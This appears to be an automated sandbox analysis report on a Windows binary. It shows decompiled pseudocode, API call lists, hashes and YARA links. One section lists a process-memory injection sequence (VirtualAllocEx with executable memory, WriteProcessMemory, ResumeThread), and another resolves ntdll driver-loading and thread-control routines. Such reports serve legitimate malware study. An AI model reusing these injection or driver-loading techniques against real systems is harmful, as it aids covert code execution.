                                                                                                                                                                  0x0040a5cf
                                                                                                                                                                  0x0040a5d4
                                                                                                                                                                  0x0040a5d7
                                                                                                                                                                  0x0040a6ed
                                                                                                                                                                  0x0040a5e5
                                                                                                                                                                  0x0040a5fa
                                                                                                                                                                  0x0040a60b
                                                                                                                                                                  0x0040a61a
                                                                                                                                                                  0x0040a620
                                                                                                                                                                  0x0040a623
                                                                                                                                                                  0x0040a62b
                                                                                                                                                                  0x0040a62f
                                                                                                                                                                  0x0040a632
                                                                                                                                                                  0x0040a659
                                                                                                                                                                  0x0040a634
                                                                                                                                                                  0x0040a635
                                                                                                                                                                  0x0040a641
                                                                                                                                                                  0x0040a648
                                                                                                                                                                  0x0040a648
                                                                                                                                                                  0x0040a668
                                                                                                                                                                  0x0040a66e
                                                                                                                                                                  0x0040a685
                                                                                                                                                                  0x0040a69e
                                                                                                                                                                  0x0040a6a8
                                                                                                                                                                  0x0040a6ad
                                                                                                                                                                  0x0040a6bd
                                                                                                                                                                  0x0040a6c5
                                                                                                                                                                  0x0040a6c8
                                                                                                                                                                  0x0040a6d0
                                                                                                                                                                  0x0040a6d1
                                                                                                                                                                  0x0040a6d2
                                                                                                                                                                  0x0040a6d3
                                                                                                                                                                  0x0040a6d3
                                                                                                                                                                  0x0040a6c8
                                                                                                                                                                  0x0040a6d7
                                                                                                                                                                  0x0040a6dc
                                                                                                                                                                  0x0040a6dc
                                                                                                                                                                  0x0040a6d7
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                                                                  • memset.MSVCRT ref: 0040A66E
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                                                                  • API String ID: 1572607441-20550370
                                                                                                                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                                                                  0x00408e38
                                                                                                                                                                  0x00408e44
                                                                                                                                                                  0x00408e56
                                                                                                                                                                  0x00408e68
                                                                                                                                                                  0x00408e7a
                                                                                                                                                                  0x00408e8c
                                                                                                                                                                  0x00408e9e
                                                                                                                                                                  0x00408eb0
                                                                                                                                                                  0x00408ec2
                                                                                                                                                                  0x00408ed4
                                                                                                                                                                  0x00408ee6
                                                                                                                                                                  0x00408ef8
                                                                                                                                                                  0x00408f0a
                                                                                                                                                                  0x00408f1c
                                                                                                                                                                  0x00408f21
                                                                                                                                                                  0x00408f23
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408f28
                                                                                                                                                                  0x00408f29

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                                  • API String ID: 667068680-4280973841
                                                                                                                                                                  • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                  • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                  • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                                                                  0x00408ae3
                                                                                                                                                                  0x00408aeb
                                                                                                                                                                  0x00408af3
                                                                                                                                                                  0x00408b76
                                                                                                                                                                  0x00408b8a
                                                                                                                                                                  0x00408b91
                                                                                                                                                                  0x00408b98
                                                                                                                                                                  0x00408bb1
                                                                                                                                                                  0x00408bb3
                                                                                                                                                                  0x00408bc6
                                                                                                                                                                  0x00408bcc
                                                                                                                                                                  0x00408bda
                                                                                                                                                                  0x00408be0
                                                                                                                                                                  0x00408bf3
                                                                                                                                                                  0x00408bfa
                                                                                                                                                                  0x00408c0b
                                                                                                                                                                  0x00408c12
                                                                                                                                                                  0x00408c17
                                                                                                                                                                  0x00408c1a
                                                                                                                                                                  0x00408c2c
                                                                                                                                                                  0x00408c39
                                                                                                                                                                  0x00408c3d
                                                                                                                                                                  0x00408c3f
                                                                                                                                                                  0x00408c41
                                                                                                                                                                  0x00408c52
                                                                                                                                                                  0x00408c58
                                                                                                                                                                  0x00408c58
                                                                                                                                                                  0x00408c6f
                                                                                                                                                                  0x00408c71
                                                                                                                                                                  0x00408c73
                                                                                                                                                                  0x00408c83
                                                                                                                                                                  0x00408c89
                                                                                                                                                                  0x00408c89
                                                                                                                                                                  0x00408c8a
                                                                                                                                                                  0x00408c8f
                                                                                                                                                                  0x00408c91
                                                                                                                                                                  0x00408c9a
                                                                                                                                                                  0x00408c93
                                                                                                                                                                  0x00408c93
                                                                                                                                                                  0x00408c93
                                                                                                                                                                  0x00408c9f
                                                                                                                                                                  0x00408ca5
                                                                                                                                                                  0x00408caf
                                                                                                                                                                  0x00408cbc
                                                                                                                                                                  0x00408cc2
                                                                                                                                                                  0x00408cc7
                                                                                                                                                                  0x00408ccd
                                                                                                                                                                  0x00408cd0
                                                                                                                                                                  0x00408cd6
                                                                                                                                                                  0x00408cd7
                                                                                                                                                                  0x00408cd8
                                                                                                                                                                  0x00408cde
                                                                                                                                                                  0x00408ce3
                                                                                                                                                                  0x00408ceb
                                                                                                                                                                  0x00408cfe
                                                                                                                                                                  0x00408d03
                                                                                                                                                                  0x00408d06
                                                                                                                                                                  0x00408d0c
                                                                                                                                                                  0x00408d21
                                                                                                                                                                  0x00408d27
                                                                                                                                                                  0x00408d0c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408ca7
                                                                                                                                                                  0x00408ca7
                                                                                                                                                                  0x00408cad
                                                                                                                                                                  0x00408d28
                                                                                                                                                                  0x00408d2e
                                                                                                                                                                  0x00408d35
                                                                                                                                                                  0x00408d36
                                                                                                                                                                  0x00408d42
                                                                                                                                                                  0x00408d48
                                                                                                                                                                  0x00408d4e
                                                                                                                                                                  0x00408d54
                                                                                                                                                                  0x00408d5a
                                                                                                                                                                  0x00408d60
                                                                                                                                                                  0x00408d66
                                                                                                                                                                  0x00408d6c
                                                                                                                                                                  0x00408d72
                                                                                                                                                                  0x00408d73
                                                                                                                                                                  0x00408d7f
                                                                                                                                                                  0x00408d85
                                                                                                                                                                  0x00408d8a
                                                                                                                                                                  0x00408d8f
                                                                                                                                                                  0x00408d90
                                                                                                                                                                  0x00408da8
                                                                                                                                                                  0x00408db9
                                                                                                                                                                  0x00408dbf
                                                                                                                                                                  0x00408dc5
                                                                                                                                                                  0x00408dc5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408cad
                                                                                                                                                                  0x00408ca5
                                                                                                                                                                  0x00408af6
                                                                                                                                                                  0x00408afc
                                                                                                                                                                  0x00408b07
                                                                                                                                                                  0x00408b2a
                                                                                                                                                                  0x00408b38
                                                                                                                                                                  0x00408b53
                                                                                                                                                                  0x00408b56
                                                                                                                                                                  0x00408b62
                                                                                                                                                                  0x00408b6a
                                                                                                                                                                  0x00408b6a
                                                                                                                                                                  0x00408b2a
                                                                                                                                                                  0x00408b07
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                                                                  • {Unknown}, xrefs: 00408BA5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                                                                  0x0040b04d
                                                                                                                                                                  0x0040b05e
                                                                                                                                                                  0x0040b060
                                                                                                                                                                  0x0040b063
                                                                                                                                                                  0x0040b06a
                                                                                                                                                                  0x0040b06d
                                                                                                                                                                  0x0040b076
                                                                                                                                                                  0x0040b07b
                                                                                                                                                                  0x0040b07e
                                                                                                                                                                  0x0040b084
                                                                                                                                                                  0x0040b08e
                                                                                                                                                                  0x0040b0a8
                                                                                                                                                                  0x0040b0aa
                                                                                                                                                                  0x0040b0ad
                                                                                                                                                                  0x0040b0b0
                                                                                                                                                                  0x0040b0b3
                                                                                                                                                                  0x0040b0b6
                                                                                                                                                                  0x0040b0b8
                                                                                                                                                                  0x0040b0bb
                                                                                                                                                                  0x0040b0be
                                                                                                                                                                  0x0040b0c1
                                                                                                                                                                  0x0040b0c4
                                                                                                                                                                  0x0040b0c7
                                                                                                                                                                  0x0040b0ca
                                                                                                                                                                  0x0040b0cd
                                                                                                                                                                  0x0040b0cd
                                                                                                                                                                  0x0040b0e5
                                                                                                                                                                  0x0040b11f
                                                                                                                                                                  0x0040b128
                                                                                                                                                                  0x0040b0e7
                                                                                                                                                                  0x0040b0e7
                                                                                                                                                                  0x0040b0f1
                                                                                                                                                                  0x0040b0f2
                                                                                                                                                                  0x0040b0f3
                                                                                                                                                                  0x0040b0fb
                                                                                                                                                                  0x0040b0fd
                                                                                                                                                                  0x0040b0fe
                                                                                                                                                                  0x0040b11d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b11d
                                                                                                                                                                  0x0040b13c
                                                                                                                                                                  0x0040b151
                                                                                                                                                                  0x0040b166
                                                                                                                                                                  0x0040b17b
                                                                                                                                                                  0x0040b190
                                                                                                                                                                  0x0040b1a5
                                                                                                                                                                  0x0040b1ba
                                                                                                                                                                  0x0040b1cf
                                                                                                                                                                  0x0040b1d6
                                                                                                                                                                  0x0040b1d7
                                                                                                                                                                  0x0040b1d8
                                                                                                                                                                  0x0040b1de
                                                                                                                                                                  0x0040b1e3

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                  • API String ID: 1223191525-1542517562
                                                                                                                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
